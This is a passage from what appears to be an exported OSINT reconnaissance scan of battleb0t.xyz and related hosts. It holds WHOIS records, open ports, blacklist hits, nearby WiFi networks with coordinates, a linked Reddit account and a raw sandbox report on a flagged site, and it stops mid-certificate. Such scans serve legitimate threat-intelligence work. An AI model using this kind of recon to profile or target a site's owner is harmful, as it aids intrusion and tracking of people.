Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T03:12:12Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
Terms of Use: Access to WHOIS information is provided to assist persons in determining the contents of a domain name registration record in the registry database. The data in this record is provided by Identity Digital or the Registry Operator for informational purposes only, and accuracy is not guaranteed. This service is intended only for query-based access. You agree that you will use this data only for lawful purposes and that, under no circumstances will you use this data to (a) allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the data recipient's own existing customers; or (b) enable high volume, automated, electronic processes that send queries or data to the systems of Registry Operator, a Registrar, or Identity Digital except as reasonably necessary to register domain names or modify existing registrations. When using the Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources. Where applicable, the presence of a [Non-Public Data] tag indicates that such data is not made publicly available due to applicable data privacy laws or requirements. Should you wish to contact the registrant, please refer to the Whois records available through the registrar URL listed above. 
Access to non-public data may be provided, upon request, where it can be reasonably confirmed that the requester holds a specific legitimate interest and a proper legal basis for accessing the withheld data. Access to this data provided by Identity Digital can be requested by submitting a request via the form found at https://www.identity.digital/about/policies/whois-layered-access/. The Registrar of Record identified in this output may have an RDDS service that can be queried for additional information on how to contact the Registrant, Admin, or Tech contact of the queried domain name. Identity Digital Inc. and Registry Operator reserve the right to modify these terms at any time. By submitting this query, you agree to abide by this policy.
Domain name: 01def.io
Registry Domain ID: e5ba8be85003487fa75e094c9481d3b7-DONUTS
Registrar WHOIS Server: whois.namecheap.com
Registrar URL: http://www.namecheap.com
Updated Date: 0001-01-01T00:00:00.00Z
Creation Date: 2022-06-03T05:37:56.70Z
Registrar Registration Expiration Date: 2026-06-03T05:37:56.70Z
Registrar: NAMECHEAP INC
Registrar IANA ID: 1068
Registrar Abuse Contact Email: abuse@namecheap.com
Registrar Abuse Contact Phone: +1.9854014545
Reseller: NAMECHEAP INC
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: addPeriod https://icann.org/epp#addPeriod
Registry Registrant ID:
Registrant Name: Redacted for Privacy
Registrant Organization: Privacy service provided by Withheld for Privacy ehf
Registrant Street: Kalkofnsvegur 2
Registrant City: Reykjavik
Registrant State/Province: Capital Region
Registrant Postal Code: 101
Registrant Country: IS
Registrant Phone: +354.4212434
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Admin ID:
Admin Name: Redacted for Privacy
Admin Organization: Privacy service provided by Withheld for Privacy ehf
Admin Street: Kalkofnsvegur 2
Admin City: Reykjavik
Admin State/Province: Capital Region
Admin Postal Code: 101
Admin Country: IS
Admin Phone: +354.4212434
Admin Phone Ext:
Admin Fax:
Admin Fax Ext:
Admin Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Registry Tech ID:
Tech Name: Redacted for Privacy
Tech Organization: Privacy service provided by Withheld for Privacy ehf
Tech Street: Kalkofnsvegur 2
Tech City: Reykjavik
Tech State/Province: Capital Region
Tech Postal Code: 101
Tech Country: IS
Tech Phone: +354.4212434
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: a922252a687d4937a189d1d7289125ed.protect@withheldforprivacy.com
Name Server: dns1.registrar-servers.com
Name Server: dns2.registrar-servers.com
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T00:12:14.09Z <<<
For more information on Whois status codes, please visit https://icann.org/epp |
| 2023-05-12 03:13:05 | Malicious Co-Hosted Site | Yes | OpenPhish | 0 | 0 | 3 | 0 | None | OpenPhish [0067ed.github.io]
https://www.openphish.com/feed.txt | 0067ed.github.io |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | 20654 (Net ID: 00:0D:3A:27:40:51) | 39.0469, -77.4903 |
| 2023-05-12 02:54:20 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://funny.battleb0t.xyz/images/withat_1.jpg | https://funny.battleb0t.xyz/ |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | MCUUID (Minecraft) (Category: gaming)
https://mcuuid.net/?q=login | login |
| 2023-05-12 02:44:21 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.com | 185.199.110.153 |
| 2023-05-12 02:52:56 | Web Technology | No | Tool - WAFW00F | 0 | 0 | 2 | 0 | None | None None | kekw.battleb0t.xyz |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | FRANZ (Net ID: 00:01:24:F2:7F:35) | 37.7642, -122.3993 |
| 2023-05-12 03:43:29 | Country | No | Country Name Extractor | 0 | 0 | 6 | 0 | None | Germany | domixo-hosting.de |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | myLGNet24CE (Net ID: 00:01:36:59:24:CC) | 37.780462,-122.390564 |
| 2023-05-12 02:45:30 | Physical Location | No | ipapi.co | 0 | 0 | 3 | 0 | None | North Charleston, South Carolina, SC, United States, US | 35.229.48.116 |
| 2023-05-12 02:55:15 | Netblock Membership | No | Censys | 3 | 0 | 3 | 0 | None | 165.232.112.0/20 | 165.232.113.85 |
| 2023-05-12 03:00:54 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 00feng00.github.io | 185.199.111.153 |
| 2023-05-12 03:00:26 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.5): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:32:06 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.4:8080 | 188.114.97.0/24 |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 4 | 0 | None | United States | keyubu.net |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Reddit (Category: social)
https://www.reddit.com/user/Battleb0t | Battleb0t |
| 2023-05-12 03:23:27 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.9:80 | 188.114.96.0/24 |
| 2023-05-12 03:01:03 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.110): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:51 | Open TCP Port Banner | No | Censys | 0 | 0 | 3 | 0 | None | HTTP/1.1 404 Not Found
Server: Netlify
X-Nf-Request-Id: 01H06G1NS24K8856E7B6C2JF02
Date: <REDACTED>
Content-Length: 0
| 34.74.170.74 |
| 2023-05-12 02:44:29 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | cloudwaysapps.com | cloudwaysapps.com |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | wilson (Net ID: 00:02:2D:08:06:B3) | 37.780462,-122.390564 |
| 2023-05-12 02:50:30 | Physical Address | No | GLEIF | 0 | 0 | 3 | 0 | None | C/O CORPORATION SERVICE COMPANY, 251 LITTLE FALLS DRIVE, WILMINGTON, US-DE, US, 19808 | GoDaddy.com, LLC |
| 2023-05-12 03:00:01 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | support@yeulpay.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://bcpzonasegurabeta.viabcp.com', u'type': u'extracted', u'verdict': u'malicious'}]}, u'total_processes': 33, u'threat_score': 50, u'compromised_hosts': [u'185.199.108.153'], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://yeulpay.com/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5812:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:5812:120:WilError_01"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\SM0:5812:120:WilError_01"\n "Local\\SM0:5576:304:WilStaging_02"\n "Local\\SM0:5576:120:WilError_01"\n "SM0:5576:120:WilError_01"\n "InternetShortcutMutex"\n "Local\\SM0:5812:120:WilError_01"\n "Local\\SM0:5812:304:WilStaging_02"\n "ChromeProcessSingletonStartup!"\n "SM0:5812:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\SM0:5812:304:WilStaging_02"\n "\\Sessions\\1\\BaseNamedObjects\\ChromeProcessSingletonStartup!"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.109.153:49730"\n "68.142.107.4:49733"\n "142.250.191.74:49734"\n "142.251.46.227:49735"\n "142.250.189.232:49736"\n "142.250.191.78:49744"\n "185.199.108.153:49747"\n "23.55.103.80:49749"'}, {u'category': 
u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"www.yeulpay.com"\n "yeulpay.com"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlref_httpsyeulpay.com" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Service Worker\\Database\\000003.log]- [targetUID: 00000000-00005812]\n "strings.json" has type "JSON data"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\json\\i18n-shared-components\\zh-Hant\\strings.json]- [targetUID: 00000000-00005812]\n "index" has type "FoxPro FPT blocks size 768 next free block index 3284796353 field type 0 dBase III DBT version number 0 next free block index 3238251203"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\index]- [targetUID: 00000000-00005812]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- [targetUID: N/A]\n "f_00023e" has type "PNG image data 1024 x 643 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "5dcfc9f4-1776-49aa-935c-1f8871834b22.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\5dcfc9f4-1776-49aa-935c-1f8871834b22.tmp]- [targetUID: 00000000-00005812]\n "b31f9cdb-f68d-4780-a157-ca8e18af8710.tmp" has type "UTF-8 Unicode 
text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\b31f9cdb-f68d-4780-a157-ca8e18af8710.tmp]- [targetUID: 00000000-00005812]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00005812]\n "4c8bd346-dc18-45c0-b9fa-b2f2b3599a07.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\4c8bd346-dc18-45c0-b9fa-b2f2b3599a07.tmp]- [targetUID: 00000000-00005812]\n "f_000243" has type "PNG image data 4000 x 2880 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "3bd3bf42-f525-46e9-8ae8-301ffa930aef.tmp" has type "ASCII text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\3bd3bf42-f525-46e9-8ae8-301ffa930aef.tmp]- [targetUID: 00000000-00001448]\n "f_00023d" has type "PNG image data 600 x 403 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "273a52e5-bd0c-47dd-8351-2a5b9f66dcbd.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\273a52e5-bd0c-47dd-8351-2a5b9f66dcbd.tmp]- [targetUID: 00000000-00005812]\n "wallet-drawer.bundle.js" has type "UTF-8 Unicode text with very long lines"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\Wallet-Checkout\\wallet-drawer.bundle.js]- [targetUID: 00000000-00005812]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Web Notifications Deny List\\1.1.0.0\\manifest.fingerprint]- [targetUID: 00000000-00005812]\n "manifest.json" has type "UTF-8 Unicode (with BOM) text with CRLF line terminators"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\111.0.1661.54\\WidevineCdm\\manifest.json]- 
[targetUID: 00000000-00005812]\n "data_2" has type "dBase III DBT version number 0 next free block index 3238316739"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\ShaderCache\\data_2]- [targetUID: 00000000-00005812]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-50', u'name': u'Creates a license file', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 0, u'threat_level': 0, u'type': 8, u'description': u'"wallet-drawer.bundle.js.LICENSE.txt" has type "Unknown"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\Wallet-Checkout\\wallet-drawer.bundle.js.LICENSE.txt]- [targetUID: 00000000-00005812]\n "tokenized-card.bundle.js.LICENSE.txt" has type "Unknown"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\Tokenized-Card\\tokenized-card.bundle.js.LICENSE.txt]- [targetUID: 00000000-00005812]\n "edge_driver.js.LICENSE.txt" has type "Unknown"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\edge_driver.js.LICENSE.txt]- [targetUID: 00000000-00005812]\n "shopping_iframe_driver.js.LICENSE.txt" has type "Unknown"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\shopping_iframe_driver.js.LICENSE.txt]- [targetUID: 00000000-00005812]\n "notification.bundle.js.LICENSE.txt" has type "Unknown"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\Notification\\notification.bundle.js.LICENSE.txt]- [targetUID: 00000000-00005812]\n "vendor.bundle.js.LICENSE.txt" has type "Unknown"- Location: [%PROGRAMFILES%\\chrome_ComponentUnpacker_BeginUnzipping5812_654090915\\vendor.bundle.js.LICENSE.txt]- [targetUID: 00000000-00005812]'}, {u'category': u'Environment Awareness', u'origin': u'API Call', u'identifier': u'api-169', u'name': u'Tries to access recent 
files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': u'CAPEC-497', u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" trying to touch file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations"\n "msedge.exe" trying to touch file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\O3IGZQ735L74LO6YZ5IP.TEMP"\n "msedge.exe" trying to touch file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\O3IGZQ735L74LO6YZ5IP.temp"\n "msedge.exe" trying to touch file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ccba5a5986c77e43.customDestinations-ms"\n "msedge.exe" trying to touch file "C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\ccba5a5986c77e43.customDestinations-ms~RF12dcbc.TMP"'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://yeulpay.com/"\n Pattern match: "https://www.googletagmanager.com/gtag/js?id=G-4HDJ19RJFF"\n Pattern match: "https://yeulpay.com"\n Pattern match: "www.yeulpay.com"\n Pattern match: "http://www.w3.org/2000/svg"\n Heuristic match: "yeulpay.com"\n Pattern match: "https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wtc3?ver=79e5,PORTRAIT:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4wqHh?ver=0f07,copyright:Yuanping"\n Pattern match: 
"www.playstation.com},{applied_policy:block,domain:bing.com},{applied_policy:block,domain:browserbench.org},{applied_policy:block,domain:www.principledtechnologies.com},{applied_policy:block,domain:web.basemark.com},{applie"\n Pattern match: "https://*excel.officeapps.live.com/*,https://*onenote.officeapps.live.com/*,https://*powerpoint.officeapps.live.com/*,https://*word-edit.officeapps.live.com/*,https://*excel.partner.officewebapps.cn/*,https://*onenote.partner.officewebapps.cn/*,"\n Pattern match: "https://yeulpay.com,supports_spdy:true},{alternative_servic |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | CCAZ (Net ID: 00:02:6F:EA:D0:4E) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MOT-1-7F (Net ID: 00:18:C0:62:7F:7F) | 32.8608, -79.9746 |
| 2023-05-12 02:46:18 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 2 | 0 | None | Internet security | skip.ns.cloudflare.com |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | tsunami (Net ID: 00:0D:29:AC:D4:3E) | 32.8608, -79.9746 |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.201): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:15 | Linked URL - External | No | Web Spider | 0 | 0 | 3 | 0 | None | https://sky.shiiyu.moe | https://nwapi2.battleb0t.xyz/ |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | myLGNet (Net ID: 00:02:A8:B1:C8:F5) | 50.1188, 8.6843 |
| 2023-05-12 03:33:28 | Malicious IP Address | Yes | VirusTotal | 0 | 0 | 3 | 0 | None | VirusTotal [185.199.111.154]
https://www.virustotal.com/en/ip-address/185.199.111.154/information/ | 185.199.111.0/24 |
| 2023-05-12 02:54:03 | BGP AS Membership | No | Censys | 0 | 0 | 2 | 0 | None | 13335 | 172.67.135.9 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 4 | 0 | None | cf-ray: 7c5f606679610ce9-EWR | {"transfer-encoding": "chunked", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "server": "cloudflare", "connection": "keep-alive", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:21 GMT", "x-frame-options": "SAMEORIGIN", "referrer-policy": "same-origin", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f606679610ce9-EWR"} |
| 2023-05-12 02:45:42 | Raw Data from RIRs | No | AbstractAPI | 0 | 0 | 2 | 0 | None | {u'city': u'San Francisco (South Beach)', u'security': {u'is_vpn': False}, u'city_geoname_id': 5326621, u'region_geoname_id': 5332921, u'country': u'United States', u'region': u'California', u'connection': {u'connection_type': u'Corporate', u'autonomous_system_organization': u'FASTLY', u'isp_name': u'Fastly', u'organization_name': u'GitHub, Inc', u'autonomous_system_number': 54113}, u'continent_code': u'NA', u'currency': {u'currency_name': u'USD', u'currency_code': u'USD'}, u'flag': {u'svg': u'https://static.abstractapi.com/country-flags/US_flag.svg', u'png': u'https://static.abstractapi.com/country-flags/US_flag.png', u'unicode': u'U+1F1FA U+1F1F8', u'emoji': u'\U0001f1fa\U0001f1f8'}, u'postal_code': u'94107', u'longitude': -118.244, u'country_code': u'US', u'timezone': {u'abbreviation': u'PDT', u'gmt_offset': -7, u'is_dst': True, u'name': u'America/Los_Angeles', u'current_time': u'19:45:41'}, u'latitude': 34.0544, u'country_geoname_id': 6252001, u'continent_geoname_id': 6255149, u'country_is_eu': False, u'ip_address': u'185.199.108.153', u'continent': u'North America', u'region_iso_code': u'CA'} | 185.199.108.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ZyXEL (Net ID: 00:13:49:64:69:8A) | 40.2024, 29.0398 |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.202): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:03 | Physical Location | No | Censys | 0 | 0 | 2 | 0 | None | San Francisco, California, 94107, United States, North America | 172.67.135.9 |
| 2023-05-12 03:24:22 | Web Content Type | No | Web Spider | 0 | 0 | 2 | 0 | None | text/html;charset=utf-8 | http://ayhu.xyz/ |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Burfas28 (Net ID: 00:15:6D:7C:EF:0A) | 40.2024, 29.0398 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | new network (Net ID: 00:02:2D:08:76:AE) | 34.0544, -118.244 |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomE46DB8 (Net ID: 00:0C:F6:E4:6D:B8) | 50.8897, 6.0563 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | McDonalds Free WiFi (Net ID: 00:14:6A:5B:53:90) | 32.8608, -79.9746 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | tradingview (Category: finance)
https://www.tradingview.com/u/login/ | login |
| 2023-05-12 03:00:14 | Internet Name | No | Certificate Transparency | 0 | 0 | 1 | 0 | None | www.ayhu.xyz | ayhu.xyz |
| 2023-05-12 03:10:00 | Affiliate - Domain Name | No | DNS Resolver | 2 | 0 | 5 | 0 | None | telleria.com | shop.telleria.com |
| 2023-05-12 03:01:00 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.101): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:54:34 | Open TCP Port | No | Censys | 0 | 0 | 3 | 0 | None | 104.21.71.14:2053 | 104.21.71.14 |
| 2023-05-12 02:44:21 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nuke.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:37:68:7b:1f:26:29:cd:a4:cc:95:52:df:e2:0a:12:6f:13
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 13 15:23:51 2023 GMT
Not After : May 14 15:23:50 2023 GMT
Subject: CN=nuke.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d9:29:5b:18:4c:1d:e8:59:eb:db:25:91:54:31:
ed:38:23:ab:0a:88:57:5c:ef:0c:7e:ca:ca:6c:71:
0b:02:fd:19:3d:6a:e8:97:28:77:25:12:e6:41:af:
0c:74:de:eb:50:90:97:94:e1:fd:e0:db:78:3a:0a:
5f:ae:54:a8:1f:8e:40:46:da:de:c8:9e:fa:c8:e7:
39:8e:1b:9f:5e:60:ec:47:c4:47:f9:79:27:17:65:
24:54:e3:e9:87:77:9b:2d:fc:59:b6:69:6a:35:59:
71:49:6c:3f:68:b3:6f:f3:47:8d:99:d8:26:4a:34:
e5:bd:98:64:13:9c:bc:2e:32:d9:f1:82:53:39:a9:
0e:5a:3e:f4:44:ad:26:19:df:02:ae:0a:8a:ee:fc:
9b:3e:7d:da:ca:fc:e7:ee:68:4f:c5:8c:ef:dc:74:
06:e9:7a:47:71:5f:53:c7:6d:09:e9:1f:2a:81:e3:
aa:4a:4a:ad:ae:9d:25:b9:f8:c2:d3:14:56:b4:75:
91:e9:be:73:0e:b4:7d:4d:da:64:95:77:6d:43:79:
73:49:a5:8a:21:01:8b:43:f7:7e:6b:34:db:43:cb:
18:86:96:0e:e7:1a:02:5a:4f:df:42:dd:88:c3:61:
4d:6b:c6:c6:bf:25:5b:76:f4:0e:86:dd:ad:d2:26:
a8:0b:2a:9a:7b:42:50:c1:2c:92:f7:92:ae:7c:b1:
d3:11:4f:23:ac:54:f9:9e:aa:91:2b:7c:ed:1c:c1:
46:1b:9b:3c:a0:2a:b1:e3:e2:b9:d0:7f:06:57:c9:
1e:63:2a:89:4d:e0:fc:34:28:ec:5f:72:15:f2:01:
80:22:e3:d2:bf:66:7b:78:f3:2a:37:36:d0:18:e7:
eb:62:58:1a:53:3f:4a:aa:c6:06:93:11:2e:9b:de:
b2:20:c5:30:35:f7:4b:de:99:68:8b:4d:f1:cf:5f:
e0:29:92:a1:d4:25:53:f6:6b:8d:eb:c8:2f:a1:48:
f6:93:3d:2d:29:1c:93:8a:83:6e:a8:d5:40:07:99:
d9:b4:ed:f4:2d:5b:2c:94:69:23:83:3f:eb:1f:20:
45:ea:f5:f6:5a:22:b5:7a:ea:e6:92:ef:69:3a:86:
e9:7d:cc:89:f5:72:d8:75:21:3a:fd:e8:3a:fd:dd:
16:43:3a:20:cf:8c:1c:3f:54:62:be:57:b4:91:f9:
1f:7b:59:bb:69:98:ad:21:46:6b:14:0b:f3:32:e9:
f3:42:4c:fe:3e:ea:f8:50:4d:7c:e3:49:32:31:e8:
73:54:2a:f5:e6:ac:fb:17:66:a1:41:7a:05:04:c9:
53:ab:bd:62:a2:65:3e:e4:d9:bf:f3:5f:60:e6:ba:
3c:1f:a9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
